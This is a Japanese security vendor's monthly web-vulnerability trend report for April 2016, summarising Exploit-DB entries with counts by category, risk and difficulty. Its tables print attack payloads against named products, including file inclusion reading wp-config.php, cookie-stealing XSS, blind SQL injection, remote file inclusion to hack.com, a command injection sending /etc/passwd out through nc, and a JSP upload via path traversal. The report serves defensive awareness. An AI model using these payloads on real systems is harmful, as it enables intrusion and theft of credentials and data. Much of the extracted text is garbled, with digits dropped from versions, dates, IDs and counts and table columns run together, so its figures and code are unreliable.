最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

06.04

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 月公開された Exploit-DB の分析結果クロスサイトスクリプティング (Cross Site Scripting) の攻撃に対する報告数が最も多かったです分析されたクロスサイトスクリプティング (Cross Site Scripting) の攻撃は単にスクリプトをパラメーターに挿入する形式で Web 開発をする時パラメーターに対するセキュアコーディングを適用していたなら簡単に防ぐことができる攻撃パターンでした該当が発見されたソフトウェアを使用する管理者は最新バージョンのアップデートおよびセキュアコーディングを行いにさらされないように備えなければなりません今月は報告数が最近になって最も少ない期間でしたしかし攻撃危険度の側では先月と比べて相変わらず危険な様子を見せてくれています特に SQL インジェクション (SQL Injection) 攻撃と関連し特定の関数を使用する攻撃が成功すればデータベースの情報を簡単に類推できるので第次第次攻撃がすぐ発生しやすい危険なが発見されました該当が発見されたソフトウェアを使用する管理者はパラメーター入力値の検証をさらに厳しく実施して追加的に発生する可能性がある SQL インジェクション (SQL Injection) 攻撃に対して備えなければなりません. 別件数カテゴリファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) RFIリモートファイル挿入 (Remote File Inclusion:RFI) コマンドインジェクション (Command Injection) SQL インジェクション (SQL Injection) 件数クロスサイトスクリプティング (Cross Site Scripting : XSS) 合計 5 別件数 5 5 0 5 0 5 0. 危険度別件数危険度件数割合早急対応要 % 高 0 87% 合計 00% 危険度別分類早急対応要高 0. 攻撃実行の難易度別件数難易度件数割合難 9% 中 % 易 8 78% 合計 00% 攻撃実行の難易度別件数 8 難中易 4. 主なソフトウェア別発生件数ソフトウェア名 Desk op5 modified ecommerce Shopsoftware PHPBack RockMongo SocialEngine GLPi ManageEngine Password Manager Ovidentia OpenCart 合計件数主なソフトウェア別発生件数 Desk op5 modified ecommerce Shopsoftware Copyright 06 Penta Security s Inc. All rights reserved

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するかあるいはクライアントに次被害を及ぼす中 : 情報漏洩攻撃実行難易度分類基準難 : 複数のを突いた攻撃パターン対象のシステムの重要な情報を取得するため高度な攻撃コードを採用したパターン知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン複数回トライするも既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別の詳細情報 EDB 番号カテゴリ攻撃難易度危険度名ソフトウェア名 Copyright 06 Penta Security s Inc. All rights reserved

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 06-04-0 9646 LFI 易高 WordPress Advanced Video Plugin.0 - admin-ajax.php LFI /wp-admin/adminajax.php?action=ave_publishpost&title=&short=rnd&ter m=rnd&thumb=../wp-config.php WordPress Advanced Video Plugin.0 06-04-05 9664 XSS 易高 ManageEngine Password Manager Pro 80 to 80 - AddMail.ve XSS POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 service=&serviceurl=&loginname=&password=<script>alert%8'xss'%9;<%fscript><!--+--+-- >&spassword=&tags=&rule=low&forwardurl=maila ccount.cc%f ManageEngine Password Manager ManageEngine Password Manager Pro 80 to 80 06-04-06 9668 SQL Injection 中高 SocialEngine 4.8.9 - SQL Injection /blogs/?category=0&end_date=&orderby=%0and% 0%8SELECT%0*%0FROM%0%8SELECT%8SLEE P%8IF%8MID%8version%8%9,,%9%0LIKE %05,99,0%9%9%9%9MTeU%9 SocialEngine SocialEngine 4.8. 06-04-06 9667 LFI 易高 9..7 - / LFI /../../../../../WEB-INF/web.xml 9.. 06-04-06 9667 RFI 易高 9..7 - login_post.jsp RFI /login_post.jsp?url=http://www.zeroscience.mk 9.. 06-04-06 9667 XSS 易高 9..7 - create_post.jsp XSS POST /webadmin/fileformats/create_post.jsp HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 9.. filenameextension="><script>alert(document.cookie)</scri pt> 06-04-08 9676 Command Injection 中早急対応要 op5 7..9 - command_test.php Command Injection /monitor/op5/nacoma/command_test.php?cmd_str=/bin/ cat%0/etc/passwd%0 %0nc%09.68..0%0 5555 op5 op5 7..9 POST /LiveTime/WebObjects/LiveTime.woa/wo/7.0.5.9.0..7. 0..0.0. HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) -Type: multipart/form-data; boundary=-------------- -------------7dd009908f 06-04- 9687 File Upload 易高 Desk 7..0, 7.0. -----------------------------7dd009908f and 6.5 - -Disposition: form-data; /LiveTime/WebObjects/LiveTime. name="0.5.9.0..7.0..0.0...4.0.0."; woa/wo/ File Upload filename="../../srv/tomcat6/webapps/livetime/bla5.jsp" -Type: application/octet-stream Desk Desk 7..0, 7.0. and 6.5 <HTML> <HEAD> <TITLE>Hello World</TITLE> </HEAD> <BODY> <H>Hello World</H> Today is: <%= new java.util.date().tostring() %> </BODY> </HTML> -----------------------------7dd009908f-- Copyright 06 Penta Security s Inc. All rights reserved

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 06-04- 968 XSS 易高 POST /rockmongo/index.php?action=login.index HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 RockMongo PHP MongoDB Administrator..8 - index.php Chrome/6.0.9.75 Safari/55.7 XSS RockMongo RockMongo PHP MongoDB Administrator..8 06-04- 9679 Command Injection 易高 OpenCart..0. to..0.0 - index.php Command Injection username="><script>alert()</script> /shop_directory/index.php?route=account/edit&b=system &c=ls OpenCart OpenCart..0. to..0.0 06-04- 9687 XSS 易高 POST /LiveTime/WebObjects/LiveTime.woa/wo/8.0.5..0.4...0. HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr Desk 7..0, 7.0. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows and 6.5 - NT 6.; WOW64; Trident/6.0) /LiveTime/WebObjects/LiveTime. -Type: multipart/form-data; boundary=-------------- woa/wo/ XSS -------------7dd009908f Desk Desk 7..0, 7.0. and 6.5 -----------------------------7dd009908f -Disposition: form-data; name="tf_orgunitname" "><script>alert()</script> -----------------------------7dd009908f-- 06-04- 9688 RFI 易高 Ovidentia troubleticketsmodule 7.6 - statistique_evolution.php RFI /troubletickets-7-6/programs/statistique_evolution.php?globals[babinstal lpath]=http://hack.com Ovidentia Ovidentia troubleticketsmo dule 7.6 06-04-4 9697 XSS 易高.0.0 - index.php XSS /phpmongodb/index.php/%%e%ciframe%0src=h ttp://www.phpmongodb.org%e.0.0 06-04-8 9705 XSS 易高 POST /wp-admin/admin.php?page=kentopvc_settings HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 WordPress Kento Post View Chrome/6.0.9.75 Safari/55.7 Counter Plugin.8 - admin.php XSS WordPress Kento Post View Counter Plugin. kento_pvc_today_text="<script>alert();</script><img src="b 06-04-8 9704 XSS 易高 WordPress leenk.me Plugin.5.0 - admin.php XSS POST /wp/wpadmin/admin.php?page=leenkme_facebook HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 WordPress leenk.me Plugin.5.0 facebook_description=%c%ftextarea%e%cscript %Eprompt%8%9%B%C%Fscript%E 06-04-9 970 SQL Injection 易高 modified ecommerce Shopsoftware.0.0.0 rev 9678 - easybillcsv.php SQL Injection /shop/api/easybill/easybillcsv.php?token=module_easybil L_CSV_CRON_TOKEN&orders_status=-'))orsleep(5)/*&customers_status=*/% modified ecommerce Shopsoftware modified ecommerce Shopsoftware.0.0.0 rev 9678 06-04-0 97 SQL Injection 難早急対応要 POST /phpback-..0/admin/ideas HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 PHPBack..0 - /phpback-..0/admin/ideas SQL Injection PHPBack PHPBack..0 search=&orderby=title,extractvalue(0x0a,concat(0x0a,(se lect USER()), 0x0a, (select DATABASE()), 0x0a, (select VERSION()))) Copyright 06 Penta Security s Inc. All rights reserved

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 06-04- 974 XSS 易高.9.6 - phpliteadmin.php XSS POST /phpliteadmin/phpliteadmin.php?action=table_create&co nfirm= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7.9.6 tablename=testtable&rows=&0_field=id&0_type=integ ER&0_defaultoption=defined"><script>alert()</script>&0 _defaultvalue=&_field=name&_type=integer&_def aultoption=defined&_defaultvalue=test 06-04-5 970 XSS 易高 - /admin/signups// XSS POST /admin/signups//background?screen=signupheader HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 signup[note]=<script>alert(onfirm(document.cookie)</scri pt> 06-04-5 970 XSS 易高 - /admin/sites//tags XSS POST /admin/sites//tags HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 page_tag[name]=<script>confirm(document.cookie)</scri pt> 06-04-5 970 XSS 易高 - /admin/sites//pages/ XSS POST /admin/sites//pages/?screen=seo HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 page[headline]=volunteer<script>confirm(document.cook ie)</script> 06-04-6 977 SQL Injection 中高..9 - field.php SQL Injection POST /modules/profile/admin/field.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7..9 quicksearch_mod_profile_field=aaaa') AND (SELECT * FROM (SELECT(SLEEP()))IRLV) AND ('DhUh' LIKE 'DhUh&button_quicksearch_mod_profile_Field=Search&fil tersel=default&limitsel=5 06-04-9 975 SQL Injection 難 /ajax/getdropdownconnect.php?fromtype=computer&ite mtype=computer&page=&page_limit=%0procedure %0analyse%8%8select%0extractvalue%8rand%8%9 早急対応要 getdropdownconnect.php SQL Inj,concat%80xa,%8IF%8MID%8version%8%9,,%9 GLPi GLPi 0.90. %0LIKE%05,%0BENCHMARK%85000000,SHA%8% 9%9,%9%9%9%9%9,%9 Copyright 06 Penta Security s Inc. All rights reserved

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4